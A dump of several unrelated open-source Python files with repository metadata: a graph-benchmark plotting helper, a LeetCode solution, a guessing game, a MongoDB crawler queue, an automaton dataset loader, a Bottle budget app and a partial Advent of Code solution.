'bcsc_mpi_rdx': 'MPI2',\n 'pcsc_mpi_map': 'MPI3',\n 'pcsc_mpi_stp': 'MPI3',\n 'bcsc_spu_stp': 'SPU1',\n 'bcsc_spu_map': 'SPU1',\n 'bcsc_spu_rdx': 'SPU2',\n 'bcsc_spu2_stp': 'SPU1_2',\n 'bcsc_spu2_map': 'SPU1_2',\n 'bcsc_spu2_rdx': 'SPU2_2',\n 'bcsc_ocl_mix': '',\n 'bcsc_ocl_stp': 'OCL1',\n 'bcsc_ocl_map': 'OCL1',\n 'bcsc_ocl_wrp': 'OCL2',\n 'bcsc_cud_mix': '',\n 'bcsc_cud_stp': 'CUD1',\n 'bcsc_cud_map': 'CUD1',\n 'bcsc_cud_wrp': 'CUD2',\n 'bcsc_cud_dyn': 'CUD3',\n\n 'rndpcsr_mpi_stp': 'MPI3$_{rand}$',\n 'blkpcsr_mpi_stp': 'MPI3$_{block}$',\n 'rndpcsc_mpi_stp': 'MPI3$_{rand}$',\n 'blkpcsc_mpi_stp': 'MPI3$_{block}$',\n}\n\ndevice = {\n 'OMP1': 'CPU',\n 'OMP2': 'CPU',\n 'OMP3': 'CPU',\n 'MKL': 'CPU',\n 'OCL1': 'GPU',\n 'OCL2': 'GPU',\n 'CUD1': 'GPU',\n 'CUD2': 'GPU',\n 'CUD3': 'GPU',\n 'CSP': 'GPU',\n 'SPU1': 'CPU+GPU',\n 'SPU2': 'CPU+GPU',\n 'SPU1_2': 'CPU+GPU',\n 'SPU2_2': 'CPU+GPU',\n 'MPI1': 'CPUs',\n 'MPI2': 'CPUs',\n 'MPI3': 'CPUs',\n}\n\nflows = {\n 'row': 'push',\n 'csr': 'push',\n 'bcsr': 'push',\n 'pcsr': 'push',\n 'col': 'pull',\n 'csc': 'pull',\n 'bcsc': 'pull',\n 'pcsc': 'pull',\n\n 'rndpcsr': 'push',\n 'blkpcsr': 'push',\n 'rndpcsc': 'pull',\n 'blkpcsc': 'pull',\n}\n\ngraphs = {\n 'europe_osm': 'OSM',\n 'hugebubbles-00020': 'BUB',\n 'cit-Patents': 'CIT',\n 'wb-edu': 'EDU',\n 'wikipedia-20070206': 'WIKI',\n 'as-Skitter': 'AS',\n 'soc-LiveJournal1': 'SOC',\n 'arabic-2005': 'WWW',\n 'coPapersCiteseer': 'COL',\n 'hollywood-2009': 'HOL',\n 'regular': 'REG',\n 'regular_stride': 'REG (stride dst)',\n 'regular_stride_sd': 'REG (stride src+dst)',\n 'erdos_renyi': 'ER',\n 'triangular_erdos_renyi': 'TER',\n 'trans_powerlaw' : 'PA',\n 'kronecker': 'KRO'\n}\n\ngraph_types = {\n 'OSM': 'real-world',\n 'BUB': 'real-world',\n 'CIT': 'real-world',\n 'EDU': 'real-world',\n 'WIKI': 'real-world',\n 'AS': 'real-world',\n 'SOC': 'real-world',\n 'WWW': 'real-world',\n 'COL': 'real-world',\n 'HOL': 'real-world',\n 'REG': 'synthetic',\n 'ER': 'synthetic',\n 'TER': 'synthetic',\n 'PA': 'synthetic',\n 'KRO': 'synthetic',\n 'REG (stride dst)': 'synthetic',\n 'REG (stride src+dst)': 'synthetic',\n}\n\nmarkers = {\n 'OMP1': ('light blue', 'o'),\n 'OMP2': ('light blue', 'D'),\n 'OMP3': ('light blue', '^'),\n 'MKL': ('light blue', '*'),\n 'OCL1': ('light red', 'o'),\n 'OCL2': ('light red', 'v'),\n 'CUD1': ('light red', 'o'),\n 'CUD2': ('light red', 'v'),\n 'CUD3': ('light red', '^'),\n 'CSP': ('light red', '*'),\n\n 'OSM': ('light blue', 'o'),\n 'BUB': ('light blue', 'o'),\n 'CIT': ('light blue', 'o'),\n 'EDU': ('light blue', 'o'),\n 'WIKI': ('light blue', 'o'),\n 'AS': ('light blue', 'o'),\n 'SOC': ('light blue', 'o'),\n 'WWW': ('light blue', 'o'),\n 'COL': ('light blue', 'o'),\n 'HOL': ('light blue', 'o'),\n\n 'REG': ('blue', 'o'),\n 'ER': ('green', '^'),\n 'TER': ('cyan', 'v'),\n 'PA': ('magenta', 's'),\n 'KRO': ('yellow', 'D'),\n\n 'bcsc_ref_def': ('light tan', '*'),\n 'bcsc_ref_map': ('light tan', 's'),\n 'bcsc_ref_stp': ('light tan', 'o'),\n 'bcsc_omp_def': ('light blue', '*'),\n 'bcsc_omp_map': ('light blue', 's'),\n 'bcsc_omp_rdx': ('light blue', 'D'),\n 'bcsc_omp_stp': ('light blue', 'o'),\n 'bcsc_mpi_def': ('light olive', '*'),\n 'bcsc_mpi_map': ('light olive', 's'),\n 'bcsc_mpi_rdx': ('light olive', 'D'),\n 'bcsc_mpi_stp': ('light olive', 'o'),\n 'pcsc_mpi_def': ('light teal', '*'),\n 'pcsc_mpi_map': ('light teal', 's'),\n 'pcsc_mpi_stp': ('light teal', 'o'),\n 'bcsc_spu_map': ('light green', 's'),\n 'bcsc_spu_rdx': ('light green', 'D'),\n 'bcsc_spu_stp': ('light green', 'o'),\n 'bcsc_ocl_map': ('light purple', 's'),\n 'bcsc_ocl_mix': ('light purple', '+'),\n 'bcsc_ocl_stp': ('light purple', 'o'),\n 'bcsc_ocl_wrp': ('light purple', 'v'),\n 'bcsc_cud_map': ('light red', 's'),\n 'bcsc_cud_mix': ('light red', '+'),\n 'bcsc_cud_stp': ('light red', 'o'),\n 'bcsc_cud_wrp': ('light red', 'v'),\n 'bcsc_cud_dyn': ('light red', '^'),\n\n 'kern_rank_cpu_lib_col': ('light blue', '*'),\n 'kern_rank_omp_def_col': ('light blue', '*'),\n 'kern_rank_omp_map_col': ('light blue', 's'),\n 'kern_rank_omp_stp_col': ('light blue', 'o'),\n 'kern_rank_omp_bin_col': ('light blue', '^'),\n 'kern_rank_ocl_def_col': ('light purple', 's'),\n 'kern_rank_ocl_stp_col': ('light purple', 'o'),\n 'kern_rank_ocl_wrp_col': ('light purple', 'v'),\n 'kern_rank_cud_def_col': ('light red', 's'),\n 'kern_rank_cud_stp_col': ('light red', 'o'),\n 'kern_rank_cud_wrp_col': ('light red', 'v'),\n 'kern_rank_cud_dyn_col': ('light red', '^'),\n 'kern_rank_cud_lib_col': ('light red', '*'),\n\n 'bcsr_ref_def': ('dark tan', '*'),\n 'bcsr_ref_map': ('dark tan', 's'),\n 'bcsr_ref_stp': ('dark tan', 'o'),\n 'bcsr_omp_def': ('dark blue', '*'),\n 'bcsr_omp_map': ('dark blue', 's'),\n 'bcsr_omp_rdx': ('dark blue', 'D'),\n 'bcsr_omp_stp': ('dark blue', 'o'),\n 'bcsr_mpi_def': ('dark olive', '*'),\n 'bcsr_mpi_map': ('dark olive', 's'),\n 'bcsr_mpi_rdx': ('dark olive', 'D'),\n 'bcsr_mpi_stp': ('dark olive', 'o'),\n 'pcsr_mpi_def': ('dark teal', '*'),\n 'pcsr_mpi_map': ('dark teal', 's'),\n 'pcsr_mpi_stp': ('dark teal', 'o'),\n 'bcsr_spu_map': ('dark green', 's'),\n 'bcsr_spu_rdx': ('dark green', 'D'),\n 'bcsr_spu_stp': ('dark green', 'o'),\n 'bcsr_ocl_map': ('dark purple', 's'),\n 'bcsr_ocl_mix': ('dark purple', '+'),\n 'bcsr_ocl_stp': ('dark purple', 'o'),\n 'bcsr_ocl_wrp': ('dark purple', 'v'),\n 'bcsr_cud_map': ('dark red', 's'),\n 'bcsr_cud_mix': ('dark red', '+'),\n 'bcsr_cud_stp': ('dark red', 'o'),\n 'bcsr_cud_wrp': ('dark red', 'v'),\n 'bcsr_cud_dyn': ('dark red', '^'),\n\n 'kern_rank_cpu_lib_row': ('dark blue', '*'),\n 'kern_rank_omp_def_row': ('dark blue', '*'),\n 'kern_rank_omp_map_row': ('dark blue', 's'),\n 'kern_rank_omp_stp_row': ('dark blue', 'o'),\n 'kern_rank_omp_bin_row': ('dark blue', '^'),\n 'kern_rank_ocl_def_row': ('dark purple', 's'),\n 'kern_rank_ocl_stp_row': ('dark purple', 'o'),\n 'kern_rank_ocl_wrp_row': ('dark purple', 'v'),\n 'kern_rank_cud_def_row': ('dark red', 's'),\n 'kern_rank_cud_stp_row': ('dark red', 'o'),\n 'kern_rank_cud_wrp_row': ('dark red', 'v'),\n 'kern_rank_cud_dyn_row': ('dark red', '^'),\n 'kern_rank_cud_lib_row': ('dark red', '*'),\n}\n\nfw_order = ['ref', 'omp', 'mpi', 'spu', 'spu2', 'ocl', 'cud']\n\ncolours = {colour: itertools.cycle(sns.light_palette(colour, len(list(count))+2, input='xkcd')[1:-1]) for colour, count in itertools.groupby(sorted(m[0] for m in markers.values()))}\nmarkers = {f: (tuple(next(colours[c])), m) for f, (c, m) in sorted(markers.items())}\n\ndef filter_markers(filter):\n global markers\n if isinstance(filter, str):\n r = re.compile(filter)\n markers = {key: val for key, val in markers.items() if r.search(key) is not None}\n elif (filter is not None):\n filter = set(filter)\n markers = {key: val for key, val in markers.items() if key in filter}\n\ndef get_name(fname, part, parts):\n if parts > 1:\n fname = fname.rsplit('.', 1)\n fname = fname[0] + ('.p%d_%d' % (parts, part)) + ((len(fname) > 1 and '.'+fname[1]) or '')\n return fname\n\ndef get_deg(fname):\n if fname == '-':\n input = sys.stdin\n elif fname.endswith('.deg'):\n input = fname\n elif os.path.isfile(fname + '.deg'):\n input = fname + '.deg'\n else:\n input = subprocess.Popen(['%s/../bin/graphdeg' % os.path.dirname(os.path.abspath(__file__)), '-mOUT', fname], stdout=subprocess.PIPE).stdout\n return np.loadtxt(input, dtype=np.int32, ndmin=1)\n\ndef get_hist(fname):\n if fname.endswith('.hist'):\n input = fname\n elif os.path.isfile(fname + '.hist'):\n input = fname + '.hist'\n else:\n return np.bincount(get_deg(fname))\n return np.loadtxt(input, dtype=np.int32, ndmin=1)\n\ndef get_heat(fname):\n if fname == '-':\n input = sys.stdin\n elif fname.endswith('.heat'):\n input = fname\n elif os.path.isfile(fname + '.heat'):\n input = fname + '.heat'\n else:\n input = subprocess.Popen(['%s/../bin/graphheat' % os.path.dirname(os.path.abspath(__file__)), '-b32', fname], stdout=subprocess.PIPE).stdout\n heat = np.loadtxt(input, dtype=np.single, ndmin=1)\n return np.reshape(heat, (-1, int(math.sqrt(heat.size))))\n\ndef get_log(fname, filter = None):\n data = pd.read_csv(fname, delim_whitespace=True, comment='#')\n\n if (filter is not None):\n data = data[data['SOLVER'].str.contains(filter)]\n\n data = data.groupby(['DATASET', '|B|', 'it', 'SOLVER'], as_index=False).mean()\n\n data['all'] = 1\n data['DATAGROUP'] = data['DATASET'].str.extract('(.+?)(?:_s\\\\d+\\\\w*)?(?:_\\\\d+\\\\w*_\\\\d+\\\\w*)?\\\\.(?:[^.]+).el_gz')\n data['FRAMEWORK'] = data['SOLVER'].str.extract('(?:kern_)?[^_]+_([^_]+)')\n data['METHOD'] = data['SOLVER'].str.extract('(?:kern_)?[^_]+_[^_]+_([^_]+)')\n data['FLOW'] = data['SOLVER'].str.extract('((?:^.*(?:cs[rc]))|(?:(?:row|col)$))')\n data['FLOW'] = data['FLOW'].map(flows)\n data['kernel'] = data['SOLVER'].map(kernels)\n data['graph'] = data['DATAGROUP'].map(graphs)\n data['dataset'] = data['graph'].map(graph_types)\n data['device'] = data['kernel'].map(device)\n\n data['DATAGROUP'] += data.groupby(['DATAGROUP'])['DATASET'].transform('nunique').map(' ({0})'.format)\n data['FRAMEWORK'] += data.groupby(['FRAMEWORK'])['SOLVER'].transform('nunique').map(' ({0})'.format)\n data['METHOD'] += data.groupby(['METHOD'])['SOLVER'].transform('nunique').map(' ({0})'.format)\n\n data['time/it'] = data['time_ms'] / data['it']\n data['|E|/sec'] = data['|E|'] / (data['time/it'] / 1000)\n # data['EPS'] = (data['|E|'] / (data['rank_us'] / 1e6)) / 1e9\n data['EPS'] = (data['|E|'] / (data['time/it'] / 1e3)) / 1e9\n # data['PS'] = ((data['|V|'] + data['|E|']) / (data['rank_us'] / 1e6)) / 1e9\n data['PS'] = ((data['|V|'] + data['|E|']) / (data['time/it'] / 1e3)) / 1e9\n data['$\\overline{D}$'] = data['|E|'] / data['|V|']\n\n return data\n\ndef merge_stats(fname, log):\n stats = pd.read_csv(fname, delim_whitespace=True, comment='#')\n stats = stats.drop(columns=['|V|', '|E|'])\n stats = stats.groupby(['DATASET'], as_index=False).mean()\n\n return pd.merge(log, stats, on='DATASET', how='left')","repo_name":"nielsAD/hgb","sub_path":"scripts/plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":12990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"6914537690","text":"\"\"\"\nLeetCode :: April 2022 Challenge :: 1260. Shift 2D Grid\njramaswami\n\"\"\"\n\n\nclass Solution:\n\n def shiftGrid(self, grid, k):\n rows = len(grid)\n cols = len(grid[0])\n cells = rows * cols\n for _ in range(k):\n last = grid[-1][-1]\n for i in range(cells-1, 0, -1):\n r, c = divmod(i, cols)\n r0, c0 = divmod(i - 1, cols)\n grid[r][c] = grid[r0][c0]\n grid[0][0] = last\n return grid\n\n\ndef test_1():\n grid = [[1,2,3],[4,5,6],[7,8,9]]\n k = 1\n expected = [[9,1,2],[3,4,5],[6,7,8]]\n assert Solution().shiftGrid(grid, k) == expected\n\n\ndef test_2():\n grid = [[1,2,3],[4,5,6],[7,8,9]]\n k = 9\n expected = [[1,2,3],[4,5,6],[7,8,9]]\n assert Solution().shiftGrid(grid, k) == expected\n","repo_name":"jramaswami/LeetCode_Python","sub_path":"shift_2d_grid.py","file_name":"shift_2d_grid.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"15115532708","text":"import random\nnumber = random.randint(1,9)\nchances = 0\n\nwhile chances<5:\n guess = input(\"Enter you guess: \")\n if guess == number:\n print(\"Congrats you won!\")\n break\n elif guess < number:\n print(\"Guess is too low. Guess a higher number\",guess)\n else:\n print(\"Guess is too high. Guess a lower number\", guess)\n \n","repo_name":"OmGautam/GuessingGame","sub_path":"guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"508733179","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n#http://cuiqingcai.com/3363.html\n\n__author__ = 'Demi Yu'\n\nfrom datetime import datetime, timedelta\nfrom pymongo import MongoClient, errors\n\n\nclass MogoQueue():\n OUTSTANDING = 1 ##初始状态\n PROCESSING = 2 ##正在下载状态\n COMPLETE = 3 ##下载完成状态\n\n def __init__(self, db, collection, timeout=300): ##初始mongodb连接\n self.client = MongoClient()\n self.Client = self.client[db]\n self.db = self.Client[collection]\n self.timeout = timeout\n\n def __bool__(self):\n \"\"\"\n 这个函数,我的理解是如果下面的表达为真,则整个类为真\n 至于有什么用,后面我会注明的(如果我的理解有误,请指点出来谢谢,我也是Python新手)\n $ne的意思是不匹配\n \"\"\"\n record = self.db.find_one(\n {'status': {'$ne': self.COMPLETE}}\n )\n return True if record else False\n\n def push(self, url, title): ##这个函数用来添加新的URL进队列\n try:\n self.db.insert({'_id': url, 'status': self.OUTSTANDING, '主题': title})\n print(url, '插入队列成功')\n except errors.DuplicateKeyError as e: ##报错则代表已经存在于队列之中了\n print(url, '已经存在于队列中了')\n pass\n\n def push_imgurl(self, title, url):\n try:\n self.db.insert({'_id': title, 'statue': self.OUTSTANDING, 'url': url})\n print('图片地址插入成功')\n except errors.DuplicateKeyError as e:\n print('地址已经存在了')\n pass\n\n def pop(self):\n \"\"\"\n 这个函数会查询队列中的所有状态为OUTSTANDING的值,\n 更改状态,(query后面是查询)(update后面是更新)\n 并返回_id(就是我们的URL),MongDB好使吧,^_^\n 如果没有OUTSTANDING的值则调用repair()函数重置所有超时的状态为OUTSTANDING,\n $set是设置的意思,和MySQL的set语法一个意思\n \"\"\"\n record = self.db.find_and_modify(\n query={'status': self.OUTSTANDING},\n update={'$set': {'status': self.PROCESSING, 'timestamp': datetime.now()}}\n )\n if record:\n return record['_id']\n else:\n self.repair()\n raise KeyError\n\n def pop_title(self, url):\n record = self.db.find_one({'_id': url})\n return record['主题']\n\n def peek(self):\n \"\"\"这个函数是取出状态为 OUTSTANDING的文档并返回_id(URL)\"\"\"\n record = self.db.find_one({'status': self.OUTSTANDING})\n if record:\n return record['_id']\n\n def complete(self, url):\n \"\"\"这个函数是更新已完成的URL完成\"\"\"\n self.db.update({'_id': url}, {'$set': {'status': self.COMPLETE}})\n\n def repair(self):\n \"\"\"这个函数是重置状态$lt是比较\"\"\"\n record = self.db.find_and_modify(\n query={\n 'timestamp': {'$lt': datetime.now() - timedelta(seconds=self.timeout)},\n 'status': {'$ne': self.COMPLETE}\n },\n update={'$set': {'status': self.OUTSTANDING}}\n )\n if record:\n print('重置URL状态', record['_id'])\n\n def clear(self):\n \"\"\"这个函数只有第一次才调用、后续不要调用、因为这是删库啊!\"\"\"\n self.db.drop()","repo_name":"YuHongJun/python-training","sub_path":"work_two_Crawler/catch_mongodb_queue.py","file_name":"catch_mongodb_queue.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"2"}
+{"seq_id":"12163322263","text":"from time import sleep\nfrom utils import Request\n\n\nclass Controller:\n\n def __init__(self, service):\n self.service = service\n\n def handle_wait(self):\n sleep(20)\n return 'Hello there', 200\n\n def handle_get(self, file_name):\n service_responce = self.service.get(Request('GET', key=file_name))\n if service_responce.is_successful:\n return service_responce.data, 200\n else:\n return '', 404\n\n def handle_put(self, flask_request, file_name, data):\n if not self.validate(flask_request):\n return '', 400\n service_responce = self.service.put(\n Request('PUT', key=file_name, data=data))\n if service_responce.is_successful:\n return '', 201\n\n def handle_delete(self, file_name):\n service_responce = self.service.delete(\n Request('DELETE', key=file_name))\n if service_responce.is_successful:\n return '', 204\n\n def validate(self, request):\n if request.method == 'PUT' and \\\n request.headers.get('Content-Type') != 'application/json':\n return False\n return True\n","repo_name":"ElectricR/WebServer","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"25465549809","text":"#!/usr/bin/python3.6\nimport fileinput, sys, collections\nimport sync as f\n\nsub1 = fileinput.input(sys.argv[1])\nsub2 = fileinput.input(sys.argv[2])\norder1 = f.createDicNamesOrder(sub1)\norder2 = f.createDicNamesOrder(sub2)\nsub1 = fileinput.input(sys.argv[1])\nsub2 = fileinput.input(sys.argv[2])\ndic1= f.createDicTextTime(sub1)\ndic2= f.createDicTextTime(sub2)\n\ninter1,inter2 = f.intersectDicts(order1,order2)\n\nset1 = set(dic1)\nset2 = set(dic2)\n\ndicTrans = {}\nmin1 = int(min(inter1))\nmin2 = int(min(inter2))\nind = min(min1,min2)\n\nif min1 <= min2:\n\tinteraux = inter1 \nelse:\n\tinteraux = inter2\nsetaux= sorted(set(interaux),reverse=True)\nprint(setaux)\nind=setaux.pop()\n\n# o dicionario é tempo: legenda\nfor n in set1.intersection(set2):\n\t\n\tif n == ind:\n\t\tif len(setaux) != 0:\n\t\t\tind=setaux.pop()\n\t\telse:\n\t\t\tind=-1\n\t\tline = \"LINHA ALTERADA\\n\"\n\t\tfor i in dic1[n]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"---> \" \n\t\tfor i in dic2[interaux[n][0]]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"\\n\"\n\t\tline.replace(\" \", \"\")\n\t\tdicTrans.update({n : line})\n\telse:\t\t\n\t\tline = \"\"\n\t\tfor i in dic1[n]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"---> \" \n\t\tfor i in dic2[n]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"\\n\"\n\t\tline.replace(\" \", \"\")\n\t\tdicTrans.update({n : line})\n\n#para ordenar o dicionario pelo \"tempo\"\nod = collections.OrderedDict(sorted(dicTrans.items()))\n\n# vamos colocar o dicionario numLegenda:legenda\nnumSub = 1\n\n# e vamos colocar este dicionario n\n\nfor i in od:\n\tprint(str(numSub) + \":\\n\", od[i])\n\tnumSub +=1\n\n\n#line= str(numSub) + \"\\n\"\n\t#numSub +=1","repo_name":"Alfredogomes/SPLN","sub_path":"trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"36823318916","text":"import os\nimport pickle\n\nimport torch\nimport pandas as pd\nfrom torch.utils.data import Dataset, Subset, DataLoader\n\nclass EquivalenceTestDataset(Dataset):\n def __init__(self, annotations_file, fa_dir, fa_transform=None, target_trasform=None):\n self.fa_labels = pd.read_csv(annotations_file, names=[\"fa_1\", \"fa_2\", \"label\"])\n self.fa_dir = fa_dir\n self.fa_transform = fa_transform\n self.target_transform = target_trasform\n \n def __len__(self):\n return len(self.fa_labels)\n \n def __getitem__(self, idx):\n if isinstance(idx, torch.Tensor):\n idx = idx.tolist()\n fa_path_1 = os.path.join(self.fa_dir, self.fa_labels.iloc[idx, 0])\n with open(fa_path_1, \"rb\") as fp:\n fa_1 = pickle.load(fp)\n fa_path_2 = os.path.join(self.fa_dir, self.fa_labels.iloc[idx, 1])\n with open(fa_path_2, \"rb\") as fp:\n fa_2 = pickle.load(fp)\n label = self.fa_labels.iloc[idx, 2]\n if self.fa_transform:\n fa_1 = self.fa_transform(fa_1)\n fa_2 = self.fa_transform(fa_2)\n if self.target_transform:\n label = self.target_transform(label)\n return fa_1, fa_2, label\n\ndef test_transform(gfa):\n lst = [int(x) for x in gfa.States]\n return torch.Tensor(lst)\n\nTRAINING_DATA_SIZE = 80_000\nequivalence_test_data = EquivalenceTestDataset(\"./equivalence_test_data/annotations_file.csv\", \"./equivalence_test_data/\", fa_transform=test_transform)\n\ntrain_data = Subset(equivalence_test_data, torch.arange(TRAINING_DATA_SIZE))\ntest_data = Subset(equivalence_test_data, torch.arange(TRAINING_DATA_SIZE, len(equivalence_test_data)))\n\ntrain = DataLoader(train_data, batch_size=6, shuffle=False)\ntest = DataLoader(test_data, batch_size=6, shuffle=False)\n\nfor fa_1, fa_2, label in train:\n print(fa_1, fa_2, label)\n exit()\n","repo_name":"mrseongminkim/SHORT","sub_path":"utils/equivalence_test_dataset.py","file_name":"equivalence_test_dataset.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31060233237","text":"\"\"\"\nRoutes and views for the bottle application.\n\"\"\"\n\nfrom bottle import route, view, run, template, request, static_file, error,get,post\nfrom datetime import datetime\nimport sqlite3\nimport codecs \nimport os \nimport sys \n\n@route('/')\n@route('/home')\n@view('index')\ndef home():\n \"\"\"Renders the home page.\"\"\"\n return dict(\n year=datetime.now().year\n )\n\n@route('/list')\n@view('list')\ndef list():\n con = sqlite3.connect(\"receipts.sqlite\")\n c = con.cursor()\n c.execute(\"\"\"\n select id,store,category,item,quantity,ui,'$' || cast(cost as float) as cost,purchasedate from receipts\n \"\"\")\n result = c.fetchall()\n output = template(\"list\",rows = result)\n return output\n\n@route(\"/budget\")\ndef budget():\n\tcon = sqlite3.connect(\"receipts.sqlite\")\n\tc = con.cursor()\n\tc.execute(\"\"\"\n\tselect distinct '$' || cast(amount as float) as 'amount', date(budgetdate) as 'DateSet','$' || r.cost as 'ExpensesTotal','$' || cast((x.budget - r.cost) as float) as 'WhatsLleft'\n from budget b,\n (select sum(cost)cost from receipts where purchasedate >= (select max(date(budgetdate)) from budget))r,\n\t(select distinct amount as budget,id from budget where id in (\n\tselect max(id) from budget))x\n\twhere b.id in (\n\tselect max(id) from budget) \n\torder by b.budgetdate desc\t\n\t\"\"\")\n\tresult = c.fetchall()\t\n\toutput = template(\"budget\",rows = result)\n\treturn output\n\n@route(\"/new\",method = \"GET\")\ndef new_item():\n\tif request.GET.get(\"save\",\"\").strip():\n\t\tnewStore = request.GET.get(\"store\",\"\").strip()\n\t\tnewCategory = request.GET.get(\"category\",\"\").strip()\n\t\tnewItem = request.GET.get(\"item\",\"\").strip()\n\t\tnewQuantity = request.GET.get(\"quantity\",\"\").strip()\n\t\tnewUi = request.GET.get(\"ui\",\"\").strip()\n\t\tnewCost = request.GET.get(\"cost\",\"\").strip()\n\t\tnewPurchasedate = request.GET.get(\"purchasedate\",\"\").strip()\n\t\tcon = sqlite3.connect(\"receipts.sqlite\")\n\t\tc = con.cursor()\n\t\tc.execute(\"\"\"\n\t\tinsert into receipts(store,category,item,quantity,ui,cost,purchasedate)values(?,?,?,?,?,?,?)\"\"\",(newStore,newCategory,newItem,newQuantity,newUi,newCost,newPurchasedate,))\n\t\tnew_id = c.lastrowid \n\t\tcon.commit()\n\t\tc.close()\n\t\turl = \"http://localhost:5555/list\"\n\t\treturn\"The new receipt was inserted into the database, the ID is {0}
List
New Expense
\".format(new_id)\n\telse:\n\t\treturn template(\"new_receipt.tpl\")\n\n@route(\"/newbudget\",method = \"GET\")\ndef new_budget():\n\tif request.GET.get(\"update\",\"\").strip():\n\t\tnewAmount = request.GET.get(\"amount\",\"\").strip()\n\t\tcon = sqlite3.connect(\"receipts.sqlite\")\n\t\tc = con.cursor()\n\t\tc.execute(\"\"\"\n\t\tinsert into budget(amount)values(?)\"\"\",(newAmount,))\n\t\tnew_id = c.lastrowid \n\t\tcon.commit()\n\t\tc.close()\n\t\treturn\"The new budget amount was inserted into the database, the ID is {0}
Budget\".format(new_id)\n\telse: \n\t\treturn template(\"new_budget.tpl\")","repo_name":"devichs/BudgetApp","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"74132058287","text":"import aoc\nimport re\nimport colorama\n\ndef main(input_blob):\n tile_dict = {}\n for raw_tile in input_blob.split(\"\\n\\n\"):\n lines = raw_tile.splitlines()\n tile_dict[lines[0].split()[1].replace(\":\", \"\")] = lines[1:]\n\n assembled_grid, tile_positions = assemble(tile_dict)\n \n min_x = min([x for x, y in tile_positions.keys()])\n max_x = max([x for x, y in tile_positions.keys()])\n min_y = min([y for x, y in tile_positions.keys()])\n max_y = max([y for x, y in tile_positions.keys()])\n part1 = int(tile_positions[(min_x, min_y)]) * int(tile_positions[(max_x, min_y)]) * int(tile_positions[(min_x, max_y)]) * int(tile_positions[(max_x, max_y)])\n\n for _ in range(4):\n for flipping in [False, True]:\n found, roughness = find_sea_monsters(assembled_grid)\n if found:\n part2 = roughness\n break\n if flipping:\n assembled_grid = flip(assembled_grid, True)\n else:\n assembled_grid = rotate(assembled_grid, 1)\n \n #print_grid(assembled_grid)\n\n return part1, part2\n\ndef get_edges(tile):\n \"\"\"0->up, 1->left, 2->down, 3->right\"\"\"\n\n edges = []\n edges.append(tile[0])\n edges.append(\"\".join([tile[i][0] for i in range(0, len(tile))])[::-1])\n edges.append(tile[-1][::-1])\n edges.append(\"\".join([tile[i][-1] for i in range(0, len(tile))]))\n\n return edges\n\ndef rotate(tile, rotation):\n \"\"\"rotation: 0->default, 1->90deg ccw, 2->180deg ccw, 3->270deg ccw\"\"\"\n\n for _ in range(rotation):\n new_tile = []\n for column in range(len(tile[0])):\n new_tile.append(\"\".join([tile[i][len(tile[0]) - column - 1] for i in range(len(tile))]))\n tile = new_tile\n return tile\n\ndef flip(tile, horizontal):\n if horizontal:\n new_tile = []\n for line in tile:\n new_tile.append(line[::-1])\n else:\n new_tile = tile[::-1]\n return new_tile\n\ndef assemble(tile_dict):\n start_tile_id = list(tile_dict.keys())[0]\n direction_dict = {0: (0, -1), 1: (-1, 0), 2: (0, 1), 3: (1, 0)}\n\n # key=position, value=tile_id\n tile_positions = {}\n tile_positions[(0, 0)] = start_tile_id\n open_set = set()\n open_set.add((0, 0))\n while open_set:\n current_position = open_set.pop()\n current_tile_id = tile_positions[current_position]\n current_edges = get_edges(tile_dict[current_tile_id])\n for other_id, other_tile in tile_dict.items():\n if other_id in tile_positions.values():\n continue\n other_edges = get_edges(other_tile)\n for direction, edge_a in enumerate(current_edges):\n for other_direction, edge_b in enumerate(other_edges):\n match = False\n needs_flip = False\n if edge_a == edge_b:\n match = True\n needs_flip = True\n if edge_a == edge_b[::-1]:\n match = True\n if match:\n d_x, d_y = direction_dict[direction]\n position = (current_position[0] + d_x, current_position[1] + d_y)\n if position not in tile_positions:\n relative_rotation = direction - other_direction + 2\n if relative_rotation < 0:\n relative_rotation += 4\n other_tile = rotate(other_tile, relative_rotation)\n if needs_flip:\n other_tile = flip(other_tile, direction in [0, 2])\n tile_dict[other_id] = other_tile\n tile_positions[position] = other_id\n open_set.add(position)\n \n min_x = min([x for x, y in tile_positions.keys()])\n max_x = max([x for x, y in tile_positions.keys()])\n min_y = min([y for x, y in tile_positions.keys()])\n max_y = max([y for x, y in tile_positions.keys()])\n\n assembled_grid = []\n for y in range(min_y, max_y + 1):\n for inner_y in range(1, len(tile_dict[start_tile_id]) - 1):\n line = \"\"\n for x in range(min_x, max_x + 1):\n other_tile = tile_dict[tile_positions[(x, y)]]\n line += other_tile[inner_y][1:-1]\n assembled_grid.append(line)\n assembled_grid = flip(assembled_grid, False)\n return assembled_grid, tile_positions\n\ndef find_sea_monsters(grid):\n sea_monster = [\n \" # \",\n \"# ## ## ###\",\n \" # # # # # # \"\n ]\n \n sea_monster_match = []\n sea_monster_match.append(re.compile(\"(?=(\" + sea_monster[0].replace(\" \", \".\") + \"))\"))\n 